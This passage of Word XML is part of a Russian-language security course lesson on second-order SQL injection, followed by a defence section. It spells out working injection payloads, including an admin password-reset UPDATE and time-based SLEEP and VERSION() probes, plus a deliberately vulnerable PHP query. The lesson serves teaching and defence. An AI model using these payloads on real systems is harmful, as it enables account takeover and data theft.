        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> скрывает смысл запроса от сигнатурного поиска.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Всегда проверяйте, как целевой стек (язык + сервер) нормализует входные данные перед передачей в СУБД.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В этом уроке мы научились обманывать «внешний контур» защиты, работая с синтаксисом и протоколами передачи. Однако иногда уязвимость скрыта не в том, что мы отправляем сейчас, а в том, как приложение использует наши данные позже. В следующем уроке мы перейдем к одной из самых коварных техник — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Second-Order SQLi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, где мы внедрим код, который сработает не сразу, а в самый неожиданный для системы момент.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Урок 1.2 — Second-Order SQLi: Эксплуатация отложенных уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>~8 мин · теория · практика</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Притаившаяся угроза: Механика и коварство Second-Order SQL-инъекций</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Большинство специалистов по безопасности привыкли к классической модели SQL-инъекции: отправил пейлоад в параметре </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GET</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POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, получил немедленный ответ от сервера или зафиксировал временную задержку. Это линейная атака, которую относительно легко обнаружить с помощью автоматизированных сканеров или динамического анализа. Однако в реальных энтерпрайз-системах с разветвленной бизнес-логикой самые опасные уязвимости часто скрываются за горизонтом первого запроса. Инъекции второго порядка (Second-Order SQLi) подобны мине замедленного действия: вы закладываете «заряд» в одном месте, а детонирует он совершенно в другом, спустя часы или даже дни, когда система обращается к ранее сохраненным данным.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Для опытного пентестера или AppSec-инженера умение находить такие векторы — это переход от банального фаззинга к глубокому пониманию архитектуры приложения. Здесь недостаточно проверять входящие параметры на наличие кавычек. Требуется анализировать жизненный цикл данных: как они попадают в базу, как трансформируются и, самое главное, в каких доверенных контекстах они используются повторно. Именно в этом «доверии» к собственным данным из БД и кроется главная архитектурная ошибка разработчиков.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Анатомия отложенного взрыва: От записи до исполнения</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Суть уязвимости второго порядка заключается в разрыве между моментом внедрения вредоносного кода и моментом его интерпретации SQL-движком. В классическом сценарии приложение выполняет фильтрацию или параметризацию данных при их записи в базу (этап INSERT или UPDATE). Разработчик чувствует себя в безопасности, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mysql_real_escape_string()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или использование подготовленных выражений (Prepared Statements) надежно нейтрализуют кавычки при сохранении. Однако проблема возникает на втором этапе, когда эти данные извлекаются из базы (SELECT) и подставляются в новый запрос без повторной проверки.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Представим систему как библиотеку с очень строгим охранником на входе. Охранник (WAF или фильтр) проверяет каждую принесенную книгу на наличие запрещенных слов. Вы приносите книгу, где на обложке написано безобидное название, но внутри спрятана инструкция по поджогу. Охранник пропускает вас, и книга ложится на полку (в базу данных). Спустя время другой сотрудник библиотеки (другой модуль приложения) берет эту книгу с полки, считая ее проверенной, и начинает выполнять инструкции, написанные внутри. В этот момент происходит катастрофа. Данные, уже находящиеся внутри периметра системы, автоматически считаются «чистыми», что и позволяет злоумышленнику обойти механизмы защиты.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ключевым фактором успеха такой атаки является понимание того, что база данных — это не просто хранилище, а транзитная зона. Если приложение использует данные профиля пользователя (например, имя или адрес) для формирования административных отчетов, генерации счетов или управления правами доступа в фоновых задачах, оно создает идеальную среду для Second-Order SQLi. Уязвимость возникает там, где разработчик забывает, что источником данных является не только пользовательский ввод напрямую, но и результат предыдущих запросов к БД.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Поиск точек входа в сложной бизнес-логике</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Обнаружение инъекций второго порядка требует иного подхода к тестированию. Автоматизированные инструменты часто пасуют перед такими задачами, так как они не могут связать два независимых HTTP-запроса в единую логическую цепочку. Исследователю необходимо вручную картировать движение данных. Первое, на что стоит обратить внимание — это любые формы регистрации и редактирования профиля. Поля «Имя пользователя», «О себе», «Адрес доставки» или даже «Настройки уведомлений» часто становятся плацдармом для атаки. Если вы можете сохранить в имени пользователя строку вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin'--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, и система это позволяет, полдела сделано.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Второй критический вектор — функционал смены пароля или восстановления доступа. Рассмотрим сценарий: вы регистрируете пользователя с именем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin' AND 1=1--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. При сохранении база получит именно эту строку. Позже, когда вы решите сменить пароль, приложение может выполнить запрос вида: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UPDATE users SET password = '$new_password' WHERE username = '$session_username'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Поскольку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>$session_username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> берется из БД и подставляется в запрос напрямую, итоговая команда превратится в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UPDATE users SET password = 'hacked' WHERE username = 'admin' AND 1=1--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Таким образом, вы измените пароль не своего аккаунта, а аккаунта администратора.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Не стоит забывать и про административные интерфейсы, которые часто строятся с меньшим вниманием к безопасности, чем публичные части сайта. Отчеты, логирование действий пользователей в БД, экспорт данных в CSV или PDF — все это потенциальные точки детонации. Если администратор открывает страницу со списком заказов, и ваше «имя клиента», содержащее SQL-пейлоад, подставляется в запрос для подсчета статистики, атака будет успешной. Это делает Second-Order SQLi особенно опасными: атакующий может не иметь прямого доступа к уязвимому функционалу, используя легитимные действия других пользователей или администраторов как триггер.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Практический сценарий: Захват аккаунта через метаданные</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Разберем конкретный кейс эксплуатации на примере веб-приложения для управления проектами. В системе есть функция создания тикета и функция внутреннего поиска по тикетам.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Этап внедрения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Вы создаете новый тикет. В поле «Заголовок» вы вводите следующий пейлоад: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ticket title' OR (SELECT 1 FROM (SELECT(SLEEP(10)))a)--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Приложение корректно сохраняет этот заголовок в таблицу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tickets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, так как использует ORM или подготовленные выражения для записи. Никаких ошибок или задержек на этом этапе нет.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Этап поиска</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: В системе есть модуль «Глобальный поиск», который ищет совпадения по всем полям. При выполнении поиска по части слова, приложение извлекает заголовки существующих тикетов и формирует сложный запрос для фильтрации результатов. Код может выглядеть так:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>$query = "SELECT * FROM search_index WHERE context = '" . $ticket['title'] . "'";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Здесь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>$ticket['title']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это данные, полученные из БД.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Эксплуатация</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: Когда любой пользователь (или вы сами) запускает процесс индексации или поиска, система извлекает ваш вредоносный заголовок и подставляет его в новый запрос. Сервер «зависает» на 10 секунд. Вы подтвердили наличие слепой SQL-инъекции второго порядка.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для полноценной эксфильтрации данных в таком сценарии часто используются подзапросы. Если вы хотите узнать версию базы данных, ваш пейлоад при регистрации может выглядеть так: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin' AND (SELECT 1 FROM (SELECT(IF(VERSION() LIKE '8.0%', SLEEP(10), 0)))a)--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. После сохранения этого имени, каждый раз, когда система будет обращаться к вашему профилю в уязвимом контексте, она будет проверять условие и выдавать результат через временную задержку.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Стратегия защиты и предотвращения</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита от атак второго порядка требует фундаментального изменения подхода к разработке: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>никакие данные не могут считаться доверенными, даже если они получены из вашей собственной базы данных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Это главный постулат безопасной архитектуры. Если данные подставляются в SQL-запрос, они должны быть параметризованы вне зависимости от их источника. Использование Prepared Statements на всех уровнях взаимодействия с СУБД полностью нивелирует угрозу Second-Order SQLi.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Вторым эшелоном защиты выступает строгая валидация типов и форматов на входе. Если поле «Имя пользователя» не должно содержать кавычек и спецсимволов, их нужно отсекать еще на этапе регистрации. Однако это лишь вспомогательная мера, так как бизнес-логика может требовать хранения сложных строк (например, в комментариях или описаниях товаров). Поэтому основной упор всегда должен делаться на контекстное кодирование и использование безопасных API для работы с БД. Аудит кода должен включать в себя отслеживание потоков данных (Data Flow Analysis) от момента их сохранения до всех точек последующего использования.</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Анализ трафика</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: Используя Burp Suite, найдите в тестовом приложении (или легальном bug bounty объекте) функционал, где данные сохраняются в профиле и отображаются в другом месте (например, в логах или админ-панели).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Проектирование пейлоада</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
